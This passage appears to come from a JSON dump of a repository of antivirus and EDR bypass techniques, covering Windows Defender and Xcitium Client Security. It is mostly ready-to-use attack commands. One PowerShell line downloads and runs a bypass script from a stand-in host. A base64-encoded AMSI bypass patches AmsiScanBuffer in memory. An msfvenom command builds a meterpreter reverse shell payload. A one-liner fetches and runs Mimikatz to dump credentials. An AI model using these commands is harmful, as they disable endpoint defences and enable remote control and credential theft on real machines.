Open an HTTP port so the target can connect to it and run bypass.ps1\n\n![](<../Windows Defender/Images/httpopencovenant.png>)\n\n1. Run the following command using the condor tool:\n\n```\npython3 condor.py -p windows/x64/exec\n```\n\n1. Paste the following command:\n\n```\npowershell -Sta -Nop -Window Hidden -Command \"iex(wget http://attacker.com/bypass.ps1 -UseBasicParsing)\"\n```\n\nSubstitute \"attacker.com\" for the ip of the attacker's machine.\n\n1. After generating the EXE, run it on the target machine.\n\n![](<../Windows Defender/Images/covenantpoc1.png>)\n\n![](<../Windows Defender/Images/covenantpoc2.png>)\n"
  },
  {
    "path": "Xcitium Client Security/README.md",
    "content": "# Xcitium Client Security\r\n\r\n## AMSI Bypass\r\n\r\nIf you need to run some Powershell command that is being blocked by AMSI, try running this command to get around it:\r\n\r\n![](<../Windows Defender/Images/amsi\\_bypass3.png>) https://gist.githubusercontent.com/FatRodzianko/c8a76537b5a87b850c7d158728717998/raw/36103d12eec662d532c9127f2396bc347d13c3c5/my-am-bypass.ps1\r\n\r\nYou can base64 encode the command to be one line. Use CyberChef to encode the code to base64.\r\n\r\n![](<../Windows Defender/Images/amsi\\_bypass2.png>) CyberChef URL:\r\n\r\nhttps://icyberchef.com/#recipe=To\\_Base64('A-Za-z0-9%2B/%3D')\\&input=JFdpbjMyID0gQCIKdXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgV2luMzIgewoKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgR2V0UHJvY0FkZHJlc3MoSW50UHRyIGhNb2R1bGUsIHN0cmluZyBwcm9jTmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShzdHJpbmcgbmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgVmlydHVhbFByb3RlY3QoSW50UHRyIGxwQWRkcmVzcywgVUludFB0ciBkd1NpemUsIHVpbnQgZmxOZXdQcm90ZWN0LCBvdXQgdWludCBscGZsT2xkUHJvdGVjdCk7Cgp9CiJACgpBZGQtVHlwZSAkV2luMzIKJHRlc3QgPSBbQnl0ZVtdXSgweDYxLCAweDZkLCAweDczLCAweDY5LCAweDJlLCAweDY0LCAweDZjLCAweDZjKQokTG9hZExpYnJhcnkgPSBbV2luMzJdOjpMb2FkTGlicmFyeShbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoJHRlc3QpKQokdGVzdDIgPSBbQnl0ZVtdXSAoMHg0MSwgMHg2ZCwgMHg3MywgMHg2OSwgMHg1MywgMHg2MywgMHg2MSwgMHg2ZSwgMHg0MiwgMHg3NSwgMHg2NiwgMHg2NiwgMHg2NSwgMHg3MikKJEFkZHJlc3MgPSBbV2luMzJdOjpHZXRQcm9jQWRkcmVzcygkTG9hZExpYnJhcnksIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkdGVzdDIpKQokcCA9IDAKW1dpbjMyXTo6VmlydHVhbFByb3RlY3QoJEFkZHJlc3MsIFt1aW50MzJdNSwgMHg0MCwgW3JlZl0kcCkKJFBhdGNoID0gW0J5dGVbXV0gKDB4MzEsIDB4QzAsIDB4MDUsIDB4NzgsIDB4MDEsIDB4MTksIDB4N0YsIDB4MDUsIDB4REYsIDB4RkUsIDB4RUQsIDB4MDAsIDB4QzMpCiMwOiAgMzEgYzAgICAgICAgICAgICAgICAgICAgeG9yICAgIGVheCxlYXgKIzI6ICAwNSA3OCAwMSAxOSA3ZiAgICAgICAgICBhZGQgICAgZWF4LDB4N2YxOTAxNzgKIzc6ICAwNSBkZiBmZSBlZCAwMCAgICAgICAgICBhZGQgICAgZWF4LDB4ZWRmZWRmCiNjOiAgYzMgICAgICAgICAgICAgICAgICAgICAgcmV0IApbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRQYXRjaCwgMCwgJEFkZHJlc3MsICRQYXRjaC5MZW5ndGgp\r\n\r\nCommand:\r\n\r\n```\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"JFdpbjMyID0gQCIKdXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgV2luMzIgewoKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgR2V0UHJvY0FkZHJlc3MoSW50UHRyIGhNb2R1bGUsIHN0cmluZyBwcm9jTmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShzdHJpbmcgbmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgVmlydHVhbFByb3RlY3QoSW50UHRyIGxwQWRkcmVzcywgVUludFB0ciBkd1NpemUsIHVpbnQgZmxOZXdQcm90ZWN0LCBvdXQgdWludCBscGZsT2xkUHJvdGVjdCk7Cgp9CiJACgpBZGQtVHlwZSAkV2luMzIKJHRlc3QgPSBbQnl0ZVtdXSgweDYxLCAweDZkLCAweDczLCAweDY5LCAweDJlLCAweDY0LCAweDZjLCAweDZjKQokTG9hZExpYnJhcnkgPSBbV2luMzJdOjpMb2FkTGlicmFyeShbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoJHRlc3QpKQokdGVzdDIgPSBbQnl0ZVtdXSAoMHg0MSwgMHg2ZCwgMHg3MywgMHg2OSwgMHg1MywgMHg2MywgMHg2MSwgMHg2ZSwgMHg0MiwgMHg3NSwgMHg2NiwgMHg2NiwgMHg2NSwgMHg3MikKJEFkZHJlc3MgPSBbV2luMzJdOjpHZXRQcm9jQWRkcmVzcygkTG9hZExpYnJhcnksIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkdGVzdDIpKQokcCA9IDAKW1dpbjMyXTo6VmlydHVhbFByb3RlY3QoJEFkZHJlc3MsIFt1aW50MzJdNSwgMHg0MCwgW3JlZl0kcCkKJFBhdGNoID0gW0J5dGVbXV0gKDB4MzEsIDB4QzAsIDB4MDUsIDB4NzgsIDB4MDEsIDB4MTksIDB4N0YsIDB4MDUsIDB4REYsIDB4RkUsIDB4RUQsIDB4MDAsIDB4QzMpCiMwOiAgMzEgYzAgICAgICAgICAgICAgICAgICAgeG9yICAgIGVheCxlYXgKIzI6ICAwNSA3OCAwMSAxOSA3ZiAgICAgICAgICBhZGQgICAgZWF4LDB4N2YxOTAxNzgKIzc6ICAwNSBkZiBmZSBlZCAwMCAgICAgICAgICBhZGQgICAgZWF4LDB4ZWRmZWRmCiNjOiAgYzMgICAgICAgICAgICAgICAgICAgICAgcmV0IApbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRQYXRjaCwgMCwgJEFkZHJlc3MsICRQYXRjaC5MZW5ndGgp\")) | IEX\r\n```\r\n\r\n### Execution\r\n\r\n![](<../Xcitium Client Security/Images/amsi-bypass.png>)\r\n\r\n## Metasploit payload based on Powershell script\r\n\r\nXcitium Client Security fails to observe commands that are executed in cmd and Powershell, because of this lack of observation it is possible to run a payload based Powershell script without needing any obfuscation. The only \"problem\" is the AMSI, which can be easily bypassed.\r\n\r\nOn the attacker's machine, create the payload using the command:\r\n\r\n```\r\nmsfvenom -p windows/x64/meterpreter/reverse_http LHOST=<HOST> LPORT=<PORT> -f psh-reflection\r\n```\r\n\r\n![](<../Xcitium Client Security/Images/msfv-pl-gen.png>)\r\n\r\nOn the target server, bypass AMSI using [command](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Xcitium%20Client%20Security#xcitium-client-security) shown above and then copy and paste the payload into Powershell.\r\n\r\n### Execution\r\n\r\n![](<../Xcitium Client Security/Images/ps-pl-msfv.png>)\r\n\r\nNote: in the screenshot at I encoded in Base64 to be in just one line.\r\n\r\n![](<../Xcitium Client Security/Images/ps-pl-success1.png>)\r\n\r\n![](<../Xcitium Client Security/Images/ps-pl-success2.png>)\r\n\r\n## Running Mimikatz via Powershell\r\n\r\nAs discussed above about the lack of concern with the execution of commands via Powershell by Client Security, a simple command to load Mimikatz via Powershell is enough.\r\n\r\nCommand:\r\n\r\n```\r\niex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\r\n```\r\n\r\n![](<../Xcitium Client Security/Images/mimikatz-bypass1.png>)\r\n\r\n![](<../Xcitium Client Security/Images/mimikatz-bypass.png>)\r\n"
  }
]